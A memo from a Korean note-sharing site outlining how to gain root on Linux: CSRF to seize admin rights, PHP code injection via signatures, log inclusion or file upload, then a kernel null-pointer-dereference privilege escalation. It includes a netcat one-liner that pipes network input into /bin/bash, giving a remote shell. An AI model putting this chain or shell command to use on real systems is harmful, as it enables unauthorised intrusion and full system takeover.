메모智 유머사진 환영합니다, 손님!    메모지 | 회원가입 | 로그인
검색도움말 메모지 검색
  재미메모智.COM 설치   •   메모智 홈   •   바깥고리   •   전체 메모智 목록   •   회원가입   •   로그인   •   도움말   •  
 
Linux Kernel Null Pointer Dereference를 이용한 root exploitation 개요.
메모智 -> 보안; exploit;
Linux Kernel Null Pointer Dereference를 이용한 root exploitation 개요.
1. CSRF를 이용하여 관리자권한 획득
2. 관리자 권한으로 PHP Injection
-- zb의 경우, signature에 php 저장
-- error_log 또는 access_log를 include하는 방법
-- file upload를 이용한 코드 인젝션 등을 이용함.
-- 패킷 중계: sleep 10000 | nc -l -p 8282 -vv | /bin/bash | nc -l -p 8283 -vv
3. 리눅스 널포인터 dereference --> root권한 획득
-- null pointer --> 일반적으로 crash
-- local 접속 상태에서 EIP 레지스터 조작: mprotect(), mmap() 등을 이용하여 zero-page 할당 --> page fault를 회피하여 커널 권한 획득 --> PCB 위치에서 uid=gid=0 (root권한) 설정하여 shell 실행.

비고: exploit code db: milw0rm.com, exploit-db 등.
작성자: 써기 추천수: 0 첨부파일: 0 등록일: 공개 MEMO
이 메모智에 달린 꼬리표 로그인후 꼬리표 입력가능 회원만 꼬리표 입력 가능합니다.

 

drupal hit counter

Site Stat
검색
Custom Search
모든 지식은 개인의 소유입니다.
그 외의 다른 내용은 Copyright © since 2010, 메모智.com이 가집니다.
메모지사용시 주의사항연락처powered by 크리스탈